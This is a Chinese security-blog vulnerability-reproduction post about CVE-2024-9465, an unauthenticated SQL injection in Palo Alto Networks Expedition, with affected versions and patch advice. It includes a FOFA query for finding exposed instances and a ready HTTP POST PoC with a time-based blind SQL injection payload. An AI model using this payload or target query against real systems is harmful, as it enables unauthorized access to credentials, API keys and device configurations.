Palo Alto Networks Expedition 未授权SQL注入漏洞(CVE-2024-9465)PoC

admin
admin
admin
140350
文章
117
评论
2024年10月13日15:21:47评论20 views字数 905阅读3分1秒阅读模式
Palo Alto Networks Expedition 未授权SQL注入漏洞(CVE-2024-9465)PoC

 

0x02

产品介绍

Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化网络安全策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。
0x03

漏洞威胁

Palo Alto Networks Expedition中存在的一个SQL注入漏洞POC及漏洞细节已经公开,该漏洞允许未经验证的攻击者获取Expedition数据库内容,例如密码哈希、用户名、设备配置和设备API密钥,利用这一点,攻击者还可以在Expedition 系统上创建和读取任意文件。
影响范围:
Palo Alto Networks Expedition < 1.2.96
0x04

漏洞环境

FOFA:

title="Expedition Project"

Palo Alto Networks Expedition 未授权SQL注入漏洞(CVE-2024-9465)PoC

0x05

漏洞复现

PoC

POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1Host: Content-Type: application/x-www-form-urlencodedaction=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(4)))test)

延时

Palo Alto Networks Expedition 未授权SQL注入漏洞(CVE-2024-9465)PoC

0x06

批量脚本验证

Nuclei验证脚本已发布
知识星球:冷漠安全

Palo Alto Networks Expedition 未授权SQL注入漏洞(CVE-2024-9465)PoC

0x07

修复建议

针对此漏洞,官方已经发布了漏洞修复版本,请立即更新到安全版本:
Palo Alto Networks Expedition >= 1.2.96
下载链接:
https://live.paloaltonetworks.com/t5/expedition/ct-p/migration_tool

安装前,请确保备份所有关键数据,并按照官方指南进行操作。安装后,进行全面测试以验证漏洞已被彻底修复,并确保系统其他功能正常运行。

0x08

 

原文始发于微信公众号(冷漠安全):「漏洞复现」Palo Alto Networks Expedition 未授权SQL注入漏洞(CVE-2024-9465)

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月13日15:21:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Palo Alto Networks Expedition 未授权SQL注入漏洞(CVE-2024-9465)PoChttps://cn-sec.com/archives/3262187.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息